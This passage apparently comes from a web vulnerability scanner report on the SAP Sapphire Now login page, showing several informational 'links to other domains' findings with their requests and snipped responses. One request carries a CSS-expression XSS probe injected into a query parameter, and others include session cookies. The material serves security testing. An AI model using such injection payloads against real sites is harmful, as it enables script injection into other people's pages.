HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?9b8c14c3-b509-4778-9ae5-13b366d5930b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.35. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:43:45 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?1771b0a7-e524-401c-8d03-27000b3840f6"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.36. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1 HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jaulcs2tyzxxmgycdn1cnz55; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; __utma=270210419.1641825112.1318688722.1318688722.1318692187.2; __utmb=270210419.1.10.1318692188; __utmc=270210419; __utmz=270210419.1318692188.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:54 GMT
Content-Length: 42982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?2671fb0a-0fc7-427d-8eb1-44dfead6fa80"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.37. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:43:40 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?55cfaa71-ac24-4d9a-8922-3260827be224"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.38. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:58:40 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?04b49c82-f6ef-41fe-8277-7bb397029464"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<div class="sapLogo" ><a href="http://www.sap.com" title="SAP" target="_blank"><img src="App_Themes/Default/images/sap-logo.png">
...[SNIP]...
<li><a href="https://www.sap.com/campaign/G_NL_SUBSCRIPTION_SAP_BUSINESS_FLASH/index.epx?URL_ID=WEB11" target="_blank">Newsletter</a>
...[SNIP]...
<li><a href="http://www.sap.com/solutions/products/sap-bydesign/index.epx#/buy-now/index.epx?class=utilitynav-buy" target="_self">Buy Now</a>
...[SNIP]...
<li><a href="https://www.sap.com/contactsap/index.epx?pmelayer=true" target="_blank"> Contact Us</a>
...[SNIP]...
<li><a href="http://www.sapphirenow.cn" target="_blank" >Beijing, China Nov. 15-17, 2011</a>
...[SNIP]...
<li><a href="http://www.sapandasug.com/">Orlando, Florida May 14-16, 2012</a>
...[SNIP]...
<li><a href="http://www.sap.com/about-sap/events/worldtour/index.epx">SAP World Tour 2011</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx" target="_blank">SAP.com</a>
...[SNIP]...
<li><a href="http://www.sap.com/index.epx#/events/index.epx" target="_blank">Events</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank" class="linkedin">linkedin</a>
...[SNIP]...
<li><a href="http://youtube.com/sapphirenow" target="_blank" class="youtube">youtube</a>
...[SNIP]...
<li><a href="http://www.facebook.com/sapphirenow" target="_blank" class="facebook">facebook</a>
...[SNIP]...
<li><a href="http://Twitter.com/sapphirenow" target="_blank" class="twitter">twitter</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target ="_blank">Privacy</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/terms_of_use.epx" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target ="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<br />
Be the first to know when; sign up for an email alert, <a href="https://www.delegate.com/sap/sapphire/interest/" class="aLink" target="_blank">click here</a>
...[SNIP]...
<td width="40"><a href="http://twitter.com/#!/sapteched" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapteched" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.youtube.com/user/SAPCommunities#g/c/3DC79D602F6E7FE1" target="_blank"><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/osview/canvas?_ch_page_id=2&_ch_panel_id=3&_ch_app_id=30&_applicationId=2000&appParams={"referrer"%3A"profile","go_to"%3A"events/540377"}&_ownerId=11767433&completeUrlHash=kekP" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://Twitter.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/twitter_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.facebook.com/sapphirenow" target="_blank"><img src="App_Themes/login/images/facebook_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://youtube.com/sapphirenow" target="_blank" ><img src="App_Themes/login/images/youtube_pop.png" border="0" alt=" " />
...[SNIP]...
<td width="40"><a href="http://www.linkedin.com/groups?mostPopular=&gid=2855549" target="_blank"><img src="App_Themes/login/images/linkedin_pop.png" border="0" alt=" " />
...[SNIP]...
17.39. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=t2xe1y45iffmlseg0oqr4aja

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:03 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<link href="css/form.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://virtualevents.wdf.sap.corp:1080/sapnetwork.js?23cad41c-0c85-4300-bd39-4853ff0fe64f"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://as00.estara.com/as/InitiateCall2.php?accountid=200106293516"></script>

